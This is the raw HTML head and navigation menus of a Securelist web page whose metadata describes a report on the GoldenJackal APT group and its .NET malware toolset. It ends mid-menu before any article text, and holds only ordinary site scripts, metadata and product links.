<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html;charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <script type="text/javascript"> /* <![CDATA[ */ var gform;gform||(document.addEventListener("gform_main_scripts_loaded",function(){gform.scriptsLoaded=!0}),window.addEventListener("DOMContentLoaded",function(){gform.domLoaded=!0}),gform={domLoaded:!1,scriptsLoaded:!1,initializeOnLoaded:function(o){gform.domLoaded&&gform.scriptsLoaded?o():!gform.domLoaded&&gform.scriptsLoaded?window.addEventListener("DOMContentLoaded",o):document.addEventListener("gform_main_scripts_loaded",o)},hooks:{action:{},filter:{}},addAction:function(o,n,r,t){gform.addHook("action",o,n,r,t)},addFilter:function(o,n,r,t){gform.addHook("filter",o,n,r,t)},doAction:function(o){gform.doHook("action",o,arguments)},applyFilters:function(o){return gform.doHook("filter",o,arguments)},removeAction:function(o,n){gform.removeHook("action",o,n)},removeFilter:function(o,n,r){gform.removeHook("filter",o,n,r)},addHook:function(o,n,r,t,i){null==gform.hooks[o][n]&&(gform.hooks[o][n]=[]);var e=gform.hooks[o][n];null==i&&(i=n+"_"+e.length),gform.hooks[o][n].push({tag:i,callable:r,priority:t=null==t?10:t})},doHook:function(n,o,r){var t;if(r=Array.prototype.slice.call(r,1),null!=gform.hooks[n][o]&&((o=gform.hooks[n][o]).sort(function(o,n){return o.priority-n.priority}),o.forEach(function(o){"function"!=typeof(t=o.callable)&&(t=window[t]),"action"==n?t.apply(null,r):r[0]=t.apply(null,r)})),"filter"==n)return r[0]},removeHook:function(o,n,t,i){var r;null!=gform.hooks[o][n]&&(r=(r=gform.hooks[o][n]).filter(function(o,n,r){return!!(null!=i&&i!=o.tag||null!=t&&t!=o.priority)}),gform.hooks[o][n]=r)}}); /* ]]> */ </script> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="https://securelist.com/xmlrpc.php" /> <link rel="apple-touch-icon" sizes="192x192" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-192x192.png"> <link rel="icon" type="image/png" sizes="192x192" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-192x192.png"> <link rel="icon" type="image/png" sizes="96x96" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-96x96.png"> <link rel="icon" type="image/png" sizes="48x48" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-48x48.png"> <link rel="icon" type="image/png" sizes="32x32" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/favicon-16x16.png"> <link rel="manifest" href="https://securelist.com/wp-content/themes/securelist2020/assets/images/favicons/site.webmanifest"> <title>GoldenJackal APT and its malicious toolset | Securelist</title> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <!-- The SEO Framework by Sybre Waaijer --> <meta name="keywords" content="APT,Backdoor,Cyber espionage,Data theft,GoldenJackal,Malware,Malware Descriptions,Malware Technologies,Microsoft Office,Targeted attacks" /> <link rel="canonical" href="https://securelist.com/goldenjackal-apt-group/109677/" /> <meta name="description" content="GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher." /> <meta property="og:type" content="article" /> <meta property="og:title" content="Meet the GoldenJackal APT group. Don’t expect any howls" /> <meta property="og:description" content="GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher." /> <meta property="og:url" content="https://securelist.com/goldenjackal-apt-group/109677/" /> <meta property="og:image" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200.jpg" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:site" content="@Securelist" /> <meta name="twitter:creator" content="@Securelist" /> <meta name="twitter:title" content="Meet the GoldenJackal APT group. Don’t expect any howls" /> <meta name="twitter:description" content="GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher." /> <meta name="twitter:image" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200.jpg" /> <script type="application/ld+json">{"@context":"https://schema.org","@type":"NewsArticle","mainEntityOfPage":{"@type":"WebPage","@id":"https://securelist.com/goldenjackal-apt-group/109677/"},"headline":"Meet the GoldenJackal APT group. Don&#8217;t expect any howls","image":"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/05/22123825/anubis-golden-jackal-binary-code-sl-1200.jpg","datePublished":"2023-05-23T08:00:02+00:00","dateModified":"2023-05-22T14:30:14+00:00","author":{"@type":"Person","name":"Giampaolo Dedola","url":"https://securelist.com/author/giampaolodedola/"},"publisher":{"@type":"Organization","name":"Kaspersky","logo":{"@type":"ImageObject","url":"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/06/04065705/article-logo-small_new.png","width":60,"height":60}},"description":"GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher."}</script> <!-- / The SEO Framework by Sybre Waaijer | 118.34ms meta | 0.14ms boot --> <link rel='dns-prefetch' href='//kasperskycontenthub.com' /> <link rel='dns-prefetch' href='//securelist.com' /> <link rel='dns-prefetch' href='//www.google.com' /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com &raquo; Feed" href="https://securelist.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com &raquo; Comments Feed" href="https://securelist.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Securelist - English - Global - securelist.com &raquo; Meet the GoldenJackal APT group. Don&#8217;t expect any howls Comments Feed" href="https://securelist.com/goldenjackal-apt-group/109677/feed/" /> <link rel='stylesheet' id='crayon-group-css' href='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/crayon-syntax-highlighter/css/min/crayon.min.css,wp-content/plugins/crayon-syntax-highlighter/themes/classic/classic.css,wp-content/plugins/crayon-syntax-highlighter/fonts/monaco.css,wp-includes/css/dist/block-library/style.min.css,wp-content/plugins/jquery-collapse-o-matic/css/core_style.css,wp-content/plugins/jquery-collapse-o-matic/css/light_style.css,wp-content/plugins/kspr_twitter_pullquote/css/style.css,wp-content/themes/securelist2020/assets/css/main.css,wp-content/plugins/kaspersky-social-sharing/assets/css/style.css,wp-content/plugins/kaspersky-social-sharing/assets/css/custom.css' type='text/css' media='all' /> <link rel='stylesheet' id='taxonomy-image-plugin-public-group-css' href='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/taxonomy-images/css/style.css' type='text/css' media='screen' /> <script type="text/javascript" src="https://securelist.com/wp-content/plugins/kaspersky-enable-jquery-migrate-helper/js/jquery/jquery-1.12.4-wp.js?ver=1.12.4-wp" id="jquery-core-js"></script> <script type="text/javascript" id="kaspersky-sso-integration-js-extra"> /* <![CDATA[ */ var kasperskySSOIntegrationData = {"authorizationURL":"https:\/\/auth.ca.uis.kaspersky.com\/connect\/authorize?client_id=securelist&client_name=Securelist&redirect_uri=https%3A%2F%2Fsecurelist.com%2Fkaspersky-sso%2Flogin%2F&response_type=code&scope=openid email profile offline_access","endSessionURL":"https:\/\/auth.ca.uis.kaspersky.com\/connect\/endsession?id_token_hint=eyJhbGciOiJSUzI1NiIsImtpZCI6IkNCNzFGQTExMjc4MzgyMzQ3OTAxNzlENkJGMkVBNkFCRkZGOEQ5OUYiLCJ4NXQiOiJ5M0g2RVNlRGdqUjVBWG5Xdnk2bXFfXzQyWjgiLCJ0eXAiOiJKV1QifQ.eyJhdF9oYXNoIjoiRHM1QjM1LWppNGhIV0M5X0RzMXhXZyIsInNpZCI6IkdCRzdmU2FqMmVQeVBIRnZUV3JoUUEiLCJzdWIiOiI0MzRiNjMxZi05NTU2LTRhMTUtYjk5OS0yYTQxYThlZjJmYzMiLCJhdXRoX3RpbWUiOiIxNzM5NzcyMDMzIiwiaWRwIjoiS2FzcGVyc2t5SWQiLCJrYXNwZXJza3kuc3ViX3ZlcnNpb24iOiIxIiwia2FzcGVyc2t5LnN1c3BpY2lvdXNfYXV0aGVudGljYXRpb24iOiJ0cnVlIiwibmJmIjoxNzM5NzcyMDM4LCJleHAiOjE3Mzk4NTg0MzgsImlhdCI6MTczOTc3MjAzOCwiaXNzIjoiaHR0cHM6Ly9hdXRoLmNhLnVpcy5rYXNwZXJza3kuY29tIiwiYXVkIjoic2VjdXJlbGlzdCJ9.MoGupMHBmoByXheRiABobA4kLTdk8F1c365JGWSisHPFNT_kPZhmh6ggVSifsbSwVDnRLTl5q7zfcI7E7K3WoIj1t8ZAdVrT5JJg_fOgyz_WrJDmzjim6VS2PDVle8BdyqikRBOgQrTx42dWUII_0wO8MMb1nm84cRyjfBrQFHCXJ2zB29Jba90HoFchCXrgOwMFFSMX7JYKjQZTBMj5Xxpr5N9I-nVvFAAz1Aaeq8gKsiNSGds1YQZqmhdcAswoqrdjePpiiiVe7RfUo4NmsshiGAxQrW4oe3p8zUwk0Mlsyiv-K3wRyCfHAno0XmZycB7gyzu12J1qOs2MnmGBRg&post_logout_redirect_uri=https:\/\/securelist.com\/kaspersky-sso\/logout\/"}; /* ]]> */ </script> <script type="text/javascript" id="kss_js-js-extra"> /* <![CDATA[ */ var kss = {"twitter_account":"Securelist"}; /* ]]> */ </script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/kaspersky-lazy-load/assets/js/lazyload.js,wp-content/plugins/kaspersky-sso-integration/assets/js/main.js,wp-content/plugins/kspr_twitter_pullquote/js/kaspersky-twitter-pullquote.js,wp-content/plugins/kaspersky-social-sharing/assets/js/social-share.js'></script> <link rel="alternate" hreflang="x-default" href="https://securelist.com/goldenjackal-apt-group/109677/" /> <script> window.dataLayer = window.dataLayer || []; window.dataLayer.push({ 'Author' : 'Giampaolo Dedola', 'PostId' : '109677', 'PublicationDate' : '2023-05-23', 'Categories': 'APT reports', 'Tags': '.NET, APT, Backdoor, Cyber espionage, Data theft, GoldenJackal, Malware, Malware Descriptions, Malware Technologies, Targeted attacks', }); </script> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-5CGZ3HG');</script> <!-- End Google Tag Manager --> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0], j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src= 'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f); })(window,document,'script','dataLayer','GTM-WZ7LJ3');</script> <!-- End Google Tag Manager --> <link rel="https://api.w.org/" href="https://securelist.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://securelist.com/wp-json/wp/v2/posts/109677" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://securelist.com/xmlrpc.php?rsd" /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://securelist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurelist.com%2Fgoldenjackal-apt-group%2F109677%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://securelist.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fsecurelist.com%2Fgoldenjackal-apt-group%2F109677%2F&#038;format=xml" /> <script type="text/javascript"> var sNew = document.createElement("script"); sNew.async = true; sNew.src = "https://kasperskycontenthub.com/?dm=ed1f9e435dc885292eab65620c51f3fb&action=load&blogid=43&siteid=1&t=258702009&back=https%3A%2F%2Fsecurelist.com%2Fgoldenjackal-apt-group%2F109677%2F" var s0 = document.getElementsByTagName('script')[0]; s0.parentNode.insertBefore(sNew, s0); </script> <script type="text/javascript"> document.write(unescape("%3Cscript src='//munchkin.marketo.net/munchkin.js' type='text/javascript'%3E%3C/script%3E")); </script> <script>Munchkin.init('802-IJN-240');</script> <meta name="google-site-verification" content="o48MojucKcP-DT5iCMR8AsvkVWP14fE78flHCqqjo50" /> <script type="text/javascript"> var jQueryMigrateHelperHasSentDowngrade = false; window.onerror = function( msg, url, line, col, error ) { // Break out early, do not processing if a downgrade reqeust was already sent. if ( jQueryMigrateHelperHasSentDowngrade ) { return true; } var xhr = new XMLHttpRequest(); var nonce = 'c380f08d63'; var jQueryFunctions = [ 'andSelf', 'browser', 'live', 'boxModel', 'support.boxModel', 'size', 'swap', 'clean', 'sub', ]; var match_pattern = /\)\.(.+?) is not a function/; var erroredFunction = msg.match( match_pattern ); // If there was no matching functions, do not try to downgrade. if ( typeof erroredFunction !== 'object' || typeof erroredFunction[1] === "undefined" || -1 === jQueryFunctions.indexOf( erroredFunction[1] ) ) { return true; } // Set that we've now attempted a downgrade request. jQueryMigrateHelperHasSentDowngrade = true; xhr.open( 'POST', 'https://securelist.com/wp-admin/admin-ajax.php' ); xhr.setRequestHeader( 'Content-Type', 'application/x-www-form-urlencoded' ); xhr.onload = function () { var response, reload = false; if ( 200 === xhr.status ) { try { response = JSON.parse( xhr.response ); reload = response.data.reload; } catch ( e ) { reload = false; } } // Automatically reload the page if a deprecation caused an automatic downgrade, ensure visitors get the best possible experience. if ( reload ) { location.reload(); } }; xhr.send( encodeURI( 'action=jquery-migrate-downgrade-version&_wpnonce=' + nonce ) ); // Suppress error alerts in older browsers return true; } </script> <div id="fb-root"></div> <script> (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/all.js#xfbml=1&appId=160639043985664"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk')); </script> <script> (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = '//apis.google.com/js/platform.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })(); </script> <link rel="icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-32x32.png" sizes="32x32" /> <link rel="icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-180x180.png" /> <meta name="msapplication-TileImage" content="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06125514/cropped-sl_favicon-270x270.png" /> </head> <body class="post-template-default single single-post postid-109677 single-format-standard lang-en_US c-theme--light"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-5CGZ3HG" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WZ7LJ3" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div id="site-top" class="site-top"> <div class="container"> <nav class="site-nav" data-element-id="product-menu"> <div class="label"> <p>Solutions for:</p> </div> <ul id="menu-product-menu-daily-nxgen" class="site-selector"><li><a target="_blank" href="https://www.kaspersky.com/home-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-home menu-item menu-item-type-custom menu-item-object-custom menu-item-87907">Home Products</a></li> <li><a title="font-icons icon-small-business" target="_blank" href="https://www.kaspersky.com/small-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-small-business menu-item menu-item-type-custom menu-item-object-custom menu-item-87908">Small Business 1-50 employees</a></li> <li><a target="_blank" href="https://www.kaspersky.com/small-to-medium-business-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-medium-business menu-item menu-item-type-custom menu-item-object-custom menu-item-87909">Medium Business 51-999 employees</a></li> <li><a target="_blank" href="https://www.kaspersky.com/enterprise-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_prodmen_sm-team_______d5c53f9a5bd411f7" data-element-id="product-menu-link" class="font-icons icon-enterprise menu-item menu-item-type-custom menu-item-object-custom menu-item-87910">Enterprise 1000+ employees</a></li> </ul> </nav> </div> </div> <header id="site-header" class="site-header js-sticky-mobile-header"> <div class="container"> <a href="" class="c-page-nav-toggle js-mobile-menu-toggle"> <span class="c-page-nav-toggle__icon"> <span></span> <span></span> <span></span> </span> </a> <a href="" class="menu-toggle"> <span></span> <span></span> <span></span> </a> <div class="c-site-title"> <div class="c-site-logo__group"> <a data-element-id="securelist-logo" href="https://securelist.com/" class="c-site-logo c-site-logo--basic"></a> <span class="c-site-tagline">by Kaspersky</span> </div> </div> <ul id="menu-my-kaspersky" class="menu-utility sticky-utility"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-87905"><a href="https://companyaccount.kaspersky.com/account/login?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="companyaccount">CompanyAccount</a> <li class="sticky-item sticky-xl-only menu-item menu-item-type-custom menu-item-object-custom menu-item-87906"><a href="https://www.kaspersky.com/enterprise-security/contact?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="getintouch">Get In Touch</a> <li class="securelist-theme-switcher menu-item menu-item-type-custom menu-item-object-custom menu-item-99824"><a data-element-id="dark-mode" href="#" class="js-theme-switcher"><i class="font-icons icon-moon"></i>Dark mode<span class="u-hidden u-inline--dark"> off</span></a> <li class="dropdown"><a data-element-id="lang-selector" href="#" class="">English</a><ul class="sub-menu-regular"><li><a href="https://securelist.ru">Russian</a></li><li><a href="https://securelist.lat">Spanish</a></li></ul> </ul> <div class="c-page-search js-main-search"> <form class="c-page-search__form c-page-search__form--small js-wizardinfosys_autosearch_form" full_search_url="https://securelist.com/?s=%q%" action="https://securelist.com/" method="get"> <div class="c-form-element c-form-element--style-fill"> <div class="c-form-element__field wp_autosearch_form_wrapper"> <input name="s" class="c-form-element__text wp_autosearch_input ac_input" data-webinars="" type="text" value="" placeholder="Search..." autocomplete="off"> </div> </div> <button class="c-button c-button--icon wp_autosearch_submit"><svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use></svg></button> </form> <div class="c-page-search__toggle js-main-search-toggle"><svg class="o-icon o-svg-icon o-svg-larger"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use></svg></div> </div> <nav class="main-nav" data-element-id="nextgen-menu"> <ul id="menu-corp-menu" class="main-menu"><li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87706"><a href="https://www.kaspersky.com/enterprise-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Solutions</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87707"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item icon-iot-embed-security menu-item menu-item-type-custom menu-item-object-custom menu-item-87710"><figure><a href="https://www.kaspersky.com/enterprise-security/embedded-security-internet-of-things?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/iot-embed-security.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/embedded-security-internet-of-things?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Internet of Things &#038; Embedded Security</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/embedded-security-internet-of-things?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-transportation-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87712"><figure><a href="https://www.kaspersky.com/enterprise-security/industrial-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/transportation-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/industrial-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Industrial Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/industrial-solution?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-fraud-prevention menu-item menu-item-type-custom menu-item-object-custom menu-item-87713"><figure><a href="https://www.kaspersky.com/enterprise-security/fraud-prevention?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/fraud-prevention.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/fraud-prevention?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Fraud Prevention</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/fraud-prevention?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item menu-item menu-item-type-custom menu-item-object-custom menu-item-87711"><a href="https://www.kaspersky.com/enterprise-security/kasperskyos?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">KasperskyOS-based solutions</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/kasperskyos?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> </ul> <li> <ul class="regular"> <li class="title"><h6>Other solutions</h6> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105615"><a href="https://www.kaspersky.com/enterprise-security/security-operations-center-soc?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky for Security Operations Center</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-105614"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-iot-infrastructure-security?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky IoT Infrastructure Security</a> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112322"><a href="https://www.kaspersky.com/enterprise-security/kaspersky-secure-remote-workspace?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Kaspersky Secure Remote Workspace</a> </ul> </ul> <li class="dropdown mega menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87714"><a href="https://www.kaspersky.com/enterprise-security/industries?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Industries</a> <ul class="submenu"> <li class="first featured featured-smaller menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-87715"> <ul class="featured section-col-l-3 no-gutter"> <li class="show-figure smaller-item icon-national-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87716"><figure><a href="https://www.kaspersky.com/enterprise-security/national-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/national-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/national-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">National Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/national-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-industrial-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87717"><figure><a href="https://www.kaspersky.com/enterprise-security/industrial?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/industrial-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/industrial?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Industrial Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/industrial?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-financial-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87718"><figure><a href="https://www.kaspersky.com/enterprise-security/finance?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/financial-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/finance?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Finance Services Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/finance?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-healthcare-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87719"><figure><a href="https://www.kaspersky.com/enterprise-security/healthcare?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/healthcare-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/healthcare?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Healthcare Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/healthcare?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-transportation-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87720"><figure><a href="https://www.kaspersky.com/enterprise-security/transportation-cybersecurity-it-infrastructure?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link"><img src="https://securelist.com/wp-content/themes/securelist2020/assets/images/enterprise-menu-icons/transportation-cybersecurity.png"</a></figure><a href="https://www.kaspersky.com/enterprise-security/transportation-cybersecurity-it-infrastructure?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" data-element-id="nextgen-menu-link">Transportation Cybersecurity</a><div class="desc"><p><a href="https://www.kaspersky.com/enterprise-security/transportation-cybersecurity-it-infrastructure?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f">Learn More</a></p></div> <li class="show-figure smaller-item icon-retail-cybersecurity menu-item menu-item-type-custom menu-item-object-custom menu-item-87721"><figure><a href="https://www.kaspersky.com/enterprise-security/retail-cybersecurity?icid=gl_seclistheader_acq_ona_smm__onl_b2b_securelist_main-menu_sm-team_______001391deb99c290f" 